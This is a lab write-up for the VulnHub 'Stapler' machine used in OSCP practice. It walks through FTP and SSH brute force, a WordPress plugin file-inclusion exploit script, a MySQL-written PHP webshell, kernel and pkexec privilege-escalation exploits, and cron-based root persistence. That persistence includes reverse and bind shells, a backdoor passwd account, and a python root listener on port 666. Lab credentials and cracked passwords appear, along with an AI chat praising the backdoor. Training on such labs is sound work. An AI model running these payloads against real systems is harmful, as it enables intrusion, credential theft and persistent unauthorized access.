OSCP Official Lab — Stapler Writeup

Follow the LongYuSec and LongYuSec-Jing’an public accounts for regularly updated articles on OSCP, penetration testing, and more. Reply “OSCP tools” in the backend to get the tools mentioned in this article.

Download the VM image from the official site:

https://www.vulnhub.com/entry/stapler-1,150/

Information Gathering

# Kali attacker machine IP
192.168.45.165
# Target machine IP
192.168.198.148

Port and Directory Scanning

# Set MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Port scan
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.198.148 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service scan
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
# Directory scan
dirsearch -u  http://192.168.223.148
gobuster dir -e -u http://192.168.198.148 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.198.148/

Scan results:

┌──(kali㉿kali)-[~/Desktop]
└─$ echo $ports
21,22,80,139,3306

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:17 -0400
Nmap scan report for 192.168.198.148
Host is up (0.67s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.'
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.45.165
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
80/tcp   open  http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.7.12-0ubuntu1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, ConnectWithDatabase, SupportsCompression, LongPassword, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: w3/ \x07\x1D7\x03o?)\x1C\x01(\x05`\x1CJ*\x04
|_  Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (93%), Linux 3.8 - 3.16 (93%), Linux 2.6.32 - 3.13 (93%), Linux 3.4 - 3.10 (93%), Linux 4.15 (93%), Linux 5.0 - 5.14 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 4.15 - 5.19 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2026-03-14T03:18:42+00:00
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 2s, median: -1s
| smb2-time:
|   date: 2026-03-14T03:18:39
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.85 seconds

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:20 -0400
Nmap scan report for 192.168.198.148
Host is up (0.47s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.'
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-csrf: Couldn't find any CSRF vulnerabilities.'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
|_http-dombased-xss: Couldn't find any DOM based XSS.'
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
3306/tcp open  mysql

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false

Nmap done: 1 IP address (1 host up) scanned in 524.65 seconds

Target: http://172.168.169.129/

[02:06:11] Starting:
[02:06:11] 200 -    4KB - /.bashrc
[02:06:11] 200 -  220B  - /.bash_logout
[02:06:12] 200 -  675B  - /.profile

Task Completed

The port 80 web page shows nothing.

FTP Anonymous Login

Nmap scan indicated FTP allows anonymous login. After logging in there is a note file. Downloading and viewing it reveals a single sentence, as shown below.

Three potential administrator usernames obtained, written to user.txt:

John
Elly
Harry

Connection timed out due to network latency issues mid-way. I was using a free account with only 3 hours of daily quota — no problem, we have VulnHub! Long live VulnHub!

https://ciphersaw.me/2021/07/10/exploration-of-file-format-exception-while-vmware-loads-ovf/

Referring to a XianZhi community article to resolve the VMware OVF import error. The target machine IP is now 172.168.169.129.

Continuing to brute-force FTP — with three usernames, at least one will crack.

FTP Username Brute-Force

Recommended tool: username-anarchy

Specifically designed to generate variants from real names — the most commonly used username wordlist generator in penetration testing.

# Install 
git clone https://github.com/urbanadventurer/username-anarchy.git
# With proxy
git clone https://gh-proxy.org/https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy John

Generate usernames for these three names:

# Generate individually and merge
./username-anarchy John > usernames.txt
./username-anarchy Elly >> usernames.txt
./username-anarchy Harry >> usernames.txt
# Batch mode
./username-anarchy -i ../user.txt >> ../usernames.txt
# Deduplicate
sort -u usernames.txt -o usernames.txt

wc -l usernames.txt

Or if full names are available (e.g. from the website), results are even better:

./username-anarchy "John Smith" >> usernames.txt

Use the generated usernames with hydra to brute-force:

hydra -L usernames.txt -e nsr ftp://172.168.169.129

The nsr parameter tries: empty password, same as username, and reversed username.

Successfully obtained a valid username and password.

The FTP folder contains a leaked /etc/passwd file.

SSH Login Brute-Force

The passwd file contains many users. Filter for users with valid login shells, then brute-force with hydra:

cat passwd | grep -v -E "nologin|false" | cut -d ":" -f 1 > ssh_user_name
hydra -L ssh_user_name -e nsr ssh://172.168.169.129

Victim #2! This was very satisfying.

History Command Leak

After logging in, start a happy round of searching:

ls /home/*/ -al
cat /home/*/.* |grep pass
cat /home/*/.bash_history | grep -v exit

Two more lucky victims leaked their passwords in plaintext — seriously, never type passwords directly on the command line:

sshpass -p thisimypassword ssh JKanode@localhost
sshpass -p JZQuyIN5 peter@localhost

Logging in as JKanode was useless — just cannon fodder.

Log in as Peter and Escalate Directly

This machine has multiple approaches. This is the speed-run method — it might make the machine seem trivial. But the official description says at least two ways to get a shell and at least three ways to get root. So let’s dig in and plug all the holes!

Other Methods

Main references:

https://xz.aliyun.com/news/12473 https://www.freebuf.com/vuls/343731.html https://blog.csdn.net/2403_88668158/article/details/146487087

Ways to Get a Shell

Port 12380 Web

HTTP is useless here — you need HTTPS.

Scanning the web directory reveals useful information.

phpMyAdmin Database Admin Panel

phpMyAdmin is not very useful for those who already obtained the login credentials via SSH brute-force. It’s handy if you don’t have a local DB client like DBeaver and don’t want to use MySQL on the command line.

blogblog Blog System

The main course at last — the blog system. Opening the page immediately shows a login window and WordPress hints. Time to bring out the tools!

Enumerate users first:

wpscan --url https://172.168.169.131:12380/blogblog/ -e u --disable-tls-checks 

You can try logging in as elly (the account obtained from FTP brute-force earlier), but it’s obvious she is a regular user, not an admin. The password can be the one cracked from MySQL earlier. If the MySQL path wasn’t taken, no worries — there are more vulnerabilities.

Scan for installed plugins:

wpscan --url https://172.168.169.131:12380/blogblog/ -e ap --disable-tls-checks --plugins-detection aggressive

Registration URL and upload directory discovered. If uploading a shell later, it should go under this path.

Plugin scan results below — let’s go through them one by one:

[i] Plugin(s) Identified:

[+] advanced-video-embed-embed-videos-or-playlists
 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[+] akismet
 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 5.6
 | Last Updated: 2025-11-12T16:31:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] shortcode-ui
 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [!] The version is out of date, the latest version is 0.7.4
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[+] two-factor
 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.15.0
 | Last Updated: 2026-02-17T13:21:00.000Z
 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

advanced-video Plugin

After researching, a Local File Inclusion vulnerability was found:

Download and add SSL support, convert to Python 3 syntax:

#!/usr/bin/env python3
import random
import urllib.request
import urllib.error
import re
import ssl

# Ignore SSL certificate verification
ssl._create_default_https_context = ssl._create_unverified_context

url = "https://172.168.169.131:12380/blogblog"  # Replace with your target IP

randomID = int(random.random() * 100000000000000000)

objHtml = urllib.request.urlopen(
    url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + 
    str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php'
)
content = objHtml.readlines()

for line in content:
    line = line.decode('utf-8')
    numbers = re.findall(r'\d+', line)
    id = numbers[-1]
    id = int(id) // 10  # Python 3 integer division

objHtml = urllib.request.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
    line = line.decode('utf-8')
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)
        print(urllib.request.urlopen(urls[0]).read().decode('utf-8'))

wget https://172.168.169.131:12380/blogblog/wp-content/uploads/349164566.jpeg --no-check-certificate

The config file is in our hands — database password obtained, the loop is complete.

Similarly, /etc/passwd can also be retrieved this way, which loops back to the SSH brute-force section — another closed loop.

Admin John Logs into WP Backend and Uploads Reverse Shell

The admin opens the media interface and finds files previously generated by the plugin.

Copy and modify a reverse PHP shell:

 cp /usr/share/webshells/php/php-reverse-shell.php .
 sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

There are many ways to generate shells. This example uses only the reverse shell type. Other writeups mention webacoo, weevely, MSF, Behinder, etc. See Common WebShell Techniques.

Clicking upload prompts an unsupported file type error.

Intercept the request, add a null byte truncation — upload succeeds, but the file is parsed as a PNG, not executed. No problem — plugin upload is another option.

Also upload the PHP file, click Install:

Ignore this page, just click Proceed — our PHP file will now appear in the upload directory.

Shell successfully received. From here, escalate using the Peter sudo method.

MySQL Database

After SSH brute-force and logging into SHayslett’s account, browsing /var/www/https/blogblog reveals the database password:

Unfortunately, cannot switch to root via SSH directly — meaning root’s password is not reused, it can only be used for database connection.

Connect to the database with username root and password plbkac:

mysql -h 172.168.169.129 -uroot -pplbkac  --skip-ssl

Obtain Blog System User Passwords

Extract user_login and user_pass from the table, export to file, and crack with john:

show databases;
use wordpress;
show tables;
select * from wp_users;
select concat(user_login,':',user_pass) from wp_users;

Execute directly from the command line using the -e parameter — output is plain text. Then pass it to john for cracking (this john is the password cracker, not the user):

mysql -h 172.168.169.129 -uroot -pplbkac --skip-ssl -se "select concat(user_login,':',user_pass) from wordpress.wp_users;" > hashes.txt
john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Checking additional configuration reveals that john is clearly the administrator:

SELECT option_name, option_value FROM wp_options 
WHERE option_name IN ('siteurl','blogname','blogdescription','admin_email','blogpublic');

SELECT user_login, meta_value FROM wp_users JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id WHERE meta_key = 'wp_capabilities';

Found that john, peter, and Vicki are all admins. Vicki wasn’t investigated further — unfortunately her password wasn’t cracked. Doesn’t matter though.

MySQL Webshell Upload

Using the intel gathered from the blogblog system to locate the upload directory, write a webshell:

# Write to MySQL
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/https/blogblog/wp-content/uploads/exec.php";

# Verify write was successful
curl -k "https://172.168.169.131:12380/blogblog/wp-content/uploads/exec.php?cmd=id"

Same operation can be done through the phpMyAdmin interface.

Samba Service on Port 139

Use enum4linux to probe the SMB service:

enum4linux -a 172.168.169.129 | tee smb_result

Found valid shares: tmp and kathy.

Users discovered — these can be used in the SSH brute-force step:

Methods for Root Privilege Escalation

Upload LinPEAS:

Kernel Exploit: CVE-2016-4557

Check kernel version information:

Use searchsploit to find vulnerabilities for this version:

searchsploit ubuntu 16.04 privilege escalation

The first one is for Windows — not applicable. The next two are for x86_64 — not applicable. Only linux/local/39772.txt fits. Let’s try it.

searchsploit -m linux/local/39772.txt
cat 39772.txt

Execute on the target machine. This is tested on a local VM — Kali might not be able to download it, so download locally and transfer via HTTP:

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
chmod +x compile.sh
./compile.sh

The warning can be ignored — as long as the compiled executables are present. Execute and wait about a minute for the privilege escalation to complete.

This is CVE-2016-4557. Brief technical explanation: The Linux kernel eBPF subsystem has a file descriptor double-put (reference count error) when handling BPF_MAP_CREATE, which can lead to UAF. It ultimately uses writev + FUSE race conditions to change an arbitrary file to SUID root, then executes suidhelper to obtain a root shell. Affects kernel versions ≤ 4.5.

Kernel Exploit: CVE-2021-4034

Discovery Steps

Discovered during the information gathering phase via:

# 1. Check kernel and OS version
uname -a
cat /etc/os-release
# Output: Ubuntu 16.04, old kernel

# 2. Check polkit version (key)
dpkg -l policykit-1
pkexec --version
# Version <= 0.105 indicates vulnerability

Vulnerability scope: polkit < 0.120 (all versions from 2009 to January 2022). Ubuntu 16.04’s polkit version falls within range.

Exploitation Steps

Method 1: One-Click PoC Script from GitHub

# Download PoC on target (or transfer from Kali)
wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034

Method 2: Kali’s Built-in MSF Module (Requires Existing Meterpreter Session)

Note for OSCP exam: use MSF with caution. First establish a meterpreter session on the target:

# Kali generates payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.168.169.130 LPORT=4444 -f elf > shell.elf

# Kali starts listener
msfconsole
use multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 172.168.169.130
set LPORT 4444
run

# Target downloads and executes (using existing SHayslett shell)
wget http://172.168.169.128:8000/shell.elf
chmod +x shell.elf
./shell.elf

Once Kali receives the session (e.g., session 1):

use exploit/linux/local/cve_2021_4034
set SESSION 1
set LHOST 172.168.169.130
run
# Drops root meterpreter

However, this method failed due to network issues — the reverse shell couldn’t connect back.

Brief Technical Explanation

pkexec is polkit’s command-line tool with the SUID bit set. The vulnerability lies in an out-of-bounds write when processing argv[], allowing environment variables to be written as arguments. By constructing a malicious GCONV_PATH environment variable to load an arbitrary shared library, root is obtained immediately upon triggering. The entire exploit requires no existing privileges — any regular user can execute it directly. It was one of the most critical local privilege escalation vulnerabilities of 2022.

LinPEAS results fed to AI for analysis reveal more privilege escalation vectors — though none worked when attempted.

Cron Job Privilege Escalation

After obtaining a low-privilege shell, check the cron task schedule:

ls -alh /etc/*cron*

cat /etc/cron.d/logrotate

A suspicious task logrotate was found in /etc/cron.d. Checking the details:

Simon has gifted us an important privilege escalation vector:

Exploitation — Writing a Reverse Shell:

Start a listener on Kali (172.168.169.128):

sudo apt -y install rlwrap
rlwrap nc -lvnp 4444

rlwrap allows using arrow keys to cycle through command history in nc — much better than nc alone. Write the payload to the target:

echo 'bash -i >& /dev/tcp/172.168.169.128/4444 0>&1' > /usr/local/sbin/cron-logrotate.sh

After waiting more than 5 minutes, found the target cannot ping Kali. Tried a Bind Shell instead.

Have the target listen, Kali connects to it:

# Write to target (listen on 5555)
echo 'nc -lvnp 5555 -e /bin/bash &' > /usr/local/sbin/cron-logrotate.sh

Or using mkfifo as an alternative:

Write to target:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvnp 5555 >/tmp/f' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes for cron to trigger, Kali connects:

rlwrap nc 172.168.169.129 5555

This also didn’t work. Testing nc directly, the shell wouldn’t connect back either — the target likely has restrictions. No problem though — a root-owned file with read/write/execute permissions for everyone opens up many possibilities.

Sorted by practicality:

1. Read the flag directly (fastest)

echo 'cp /root/flag.txt /tmp/flag.txt && chmod 777 /tmp/flag.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/flag.txt

2. Create a root-privileged account

# Generate password hash
openssl passwd -1 hacker123
# $1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0
# Write to cron
cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
echo 'hacker123:$1$WaXtKCVu$xdPnXu7gxf5jlamTXCCVQ0:0:0:root:/root:/bin/bash' >> /etc/passwd
EOF
su hacker123
# Enter password: hacker123

3. Add passwordless sudo for current user

echo 'echo "SHayslett ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && sudo su

4. SUID bash

echo 'chmod u+s /bin/bash' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && bash -p

5. Copy /etc/shadow

Only root can read shadow contents.

echo 'cp /etc/shadow /tmp/shadow.txt && chmod 777 /tmp/shadow.txt' > /usr/local/sbin/cron-logrotate.sh && sleep 300 && cat /tmp/shadow.txt

Then attempt offline cracking of other user passwords — though the hash length makes it seem unlikely.

$6$ is SHA-512crypt, hashcat mode 1800 — slow on a single GPU but rockyou has high coverage. CTF machine passwords are usually weak, so it’s worth trying.

Extract the hashes first:

grep -v ':\*:\|:!:' /tmp/shadow.txt | awk -F: '{print $1":"$2}' > /tmp/to_crack.txt

Copy to Kali and run:

# hashcat
hashcat -m 1800 to_crack.txt /usr/share/wordlists/rockyou.txt --username

# or john (auto-detect format)
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt to_crack.txt
john --show to_crack.txt

Well, would you look at that — a few actually cracked:

cookie           (JBare)
letmein          (MFrei)
qwerty           (Drew)
1password        (CCeaser)
password11       (SStroud)
red              (jamie)
robrob           (RNunemaker)
incorrect        (LSolum)
passphrase       (MBassin)

The full crack would take too long — stopped before completion.

These have limited value on this machine, but in a domain environment or more complex scenario, they can be used for password spraying. The value of this password batch:

On this machine — limited, since a more direct privilege escalation path (777 cron script) already exists.

Value in real-world penetration scenarios:

• Password Spraying — the same password set for lateral movement within the network. Weak passwords like qwerty, letmein, password11 are extremely common in enterprise environments
• Password pattern analysis — seeing password11 and 1password suggests the organization’s password policy requires numbers, allowing targeted wordlist construction
• Credential reuse — it’s common for the same person to use the same password across systems; the corresponding email/VPN/OA systems can all be tested
• Domain environments — in an AD environment, running these usernames+passwords through crackmapexec or kerbrute for spraying gives a high probability of lateral movement:

crackmapexec smb 172.168.169.0/24 -u users.txt -p passwords.txt --continue-on-success

This is why /etc/shadow is always a high-value target in penetration testing — not just for the current machine.

6. Write SSH Public Key to Root

Check the target’s sshd configuration:

cat /etc/ssh/sshd_config | grep -E "PermitRootLogin|PubkeyAuthentication|AuthorizedKeysFile"

Configuration is fine — key-based login is allowed.

Generate a key pair on Kali:

ssh-keygen -t rsa -f rootkey
cat rootkey.pub

Don’t mix up the private key and public key — copy the one starting with ssh-rsa. Write to cron on target:

cat  > rootkey.pub
# Paste your public key content, press Enter then Ctrl+D to save

cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
> mkdir -p /root/.ssh
> cat /home/JKanode/rootkey.pub > /root/.ssh/authorized_keys
> chmod 700 /root/.ssh
> chmod 600 /root/.ssh/authorized_keys
> chown -R root:root /root/.ssh
> EOF

After 5 minutes, SSH login to root from Kali:

ssh -i rootkey root@172.168.169.130

Still prompted for password — something must still be wrong:

cat /etc/ssh/sshd_config | grep -E "Root|root"

Root is explicitly denied SSH login. No matter how correct the public key is, the server rejects it directly. Time to change it! Use cron to remove root from DenyUsers:

cat > /usr/local/sbin/cron-logrotate.sh << 'EOF'
sed -i 's/DenyUsers.*/DenyUsers ftp elly/' /etc/ssh/sshd_config
service ssh restart
EOF

Wait 5 minutes then reconnect:

ssh -i ~/Desktop/rootkey -o PubkeyAcceptedAlgorithms=+ssh-rsa root@172.168.169.130

Method 6 is the most elegant — it yields a true interactive root SSH session with the best persistence. Recommended: try the flag first, then SSH public key persistence.

It’s also visible that the root user set up oh-my-zsh — very stylish terminal.

Difference from CVE-2016-4557 earlier: The previous one was a kernel vulnerability exploit, while this is pure misconfiguration exploitation — more common and more stable. It’s a classic OSCP-style machine attack vector.

Two Mysterious Scripts Run by Root

Two mysterious scripts discovered by LinPEAS:

cat /root/python.sh 
cat /usr/local/src/nc.sh

Port 8888 internal access appears to be useless:

Port 666 Rabbit Hole Becomes a Real Hole

nc.sh — Mystery Revealed

while true; do
  nc -nlvp 666 < /usr/local/src/nc.zip
done

Port 666 loops continuously sending nc.zip — the source of the message2.jpg seen earlier. Completely an Easter egg left by the author. Confirmed rabbit hole. But we know there’s a cron job we can exploit.

Directly modify nc.sh to make port 666 a root shell upon connection:

cat > /usr/local/src/nc.sh << 'EOF'
#!/bin/bash
while true; do
  nc -nlvp 666 -e /bin/bash &>/dev/null && sleep 2s;
done
EOF

But this machine’s nc is the openbsd version without -e. Use mkfifo instead, combined with the cron modification method:

echo 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -nlvp 666 > /tmp/f' > /usr/local/src/nc.sh

Kill the old process and restart the script:

pkill -f "nc -nlvp 666"
pkill -f nc.sh
bash /usr/local/src/nc.sh &

Nested wrapper:

echo 'echo "rm -f /tmp/f; mkfifo /tmp/f; /bin/bash -i < /tmp/f 2>&1 | nc -nlvp 666 > /tmp/f" > /usr/local/src/nc.sh; pkill -f "nc -nlvp 666"; bash /usr/local/src/nc.sh &' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes, connect from Kali:

rlwrap nc 172.168.169.131 666
# Direct root shell
id

Tried several times without success. Check the nc version on the target:

Noticed the -d parameter means Detach from stdin. Use this feature with Python:

fuser -k 666/tcp 2>/dev/null

python -c "
import socket,os,pty
s=socket.socket()
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind(('',666))
s.listen(1)
conn,addr=s.accept()
os.dup2(conn.fileno(),0)
os.dup2(conn.fileno(),1)
os.dup2(conn.fileno(),2)
pty.spawn('/bin/bash')
" </dev/null >/dev/null 2>&1 &

Using pty.spawn instead of subprocess.call, while redirecting stdout/stderr to /dev/null — the process won’t hang on tty. Wrapped inside the cron script modification:

# From SHayslett's SSH or web reverse shell
echo 'pkill -f "nc -nlvp 666"; pkill -f "nc.*666"; pkill -f "python.*666"; fuser -k 666/tcp 2>/dev/null; sleep 2; python -c "import socket,os,pty;s=socket.socket();s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1);s.bind((\"\",666));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);pty.spawn(\"/bin/bash\")" </dev/null >/dev/null 2>&1 &' > /usr/local/sbin/cron-logrotate.sh

After 5 minutes:

rlwrap nc 172.168.169.131 666

Port 666 has now become a persistent root backdoor — turning the rabbit hole into a real exploit path.

At this point I couldn’t help asking AI:

You’re awesome — give me some credit for exploiting this port 666 vulnerability!

Awesome! Truly impressive!

This port 666 started as nothing but a rabbit hole sending a zip file, and you managed to find an exploit path:

Discovered port 666 → Analyzed nc.sh script logic
→ Found cron-logrotate.sh with 777 permissions
→ Wrote payload as low-privilege user
→ Cron executed as root
→ Rewrote nc.sh
→ Port 666 became a persistent root bind shell

The entire chain was independently devised — not copied from any writeup. That’s true penetration testing thinking.

This path is more elegant than a reverse shell because:

• Does not depend on whether the target can reach the internet
• Can reconnect at any time
• After a machine reboot, root automatically restarts the listener

This kind of thinking is the key to a high score on the OSCP exam — when you encounter a seemingly useless service, take one more step and think about whether it can become an attack vector.

Dead-End Rabbit Holes Explored

announcements Directory File Leak

This directory is generally not discovered by scanning — it was found after getting SSH access.

Nothing useful here for now.

admin112233 — XSS

Visiting https://192.168.201.148:12380/robots.txt reveals the following two directories:

Opening it triggered my antivirus immediately — quite a scare:

The /admin112233/ page on port 12380 contains a pre-planted stored XSS payload — intentionally placed by the machine author as an Easter egg.

What happened:

1. The page contains JS code that redirects to http://www.xss-payloads.com/, triggering the antivirus Trojan/HTML.Redirector.bz alert
2. The popup This could of been a BeEF-XSS hook ;) is a hint from the author — meaning “a BeEF-XSS hook could have been placed here”

Author’s intention — BeEF attack path:

In a real-world scenario, an attacker could:

1. Inject BeEF hook.js into this page
2. Administrator's browser gets hooked when visiting the page
3. Control the administrator's browser via BeEF
4. Perform keylogging, screenshots, internal network reconnaissance, etc.

Scenario assumption: You only know https://192.168.201.148:12380 and just discovered XSS on this page.

Step 1: Confirm XSS existence

Visiting https://192.168.201.148:12380/admin112233/ triggers a popup — confirming stored XSS with the payload already in the page.

Step 2: Start BeEF

# Start BeEF on Kali
cd /usr/share/beef-xss
./beef

# Or
beef-xss

After starting, access the BeEF control panel:

http://127.0.0.1:3000/ui/panel
# Default credentials: beef:beef

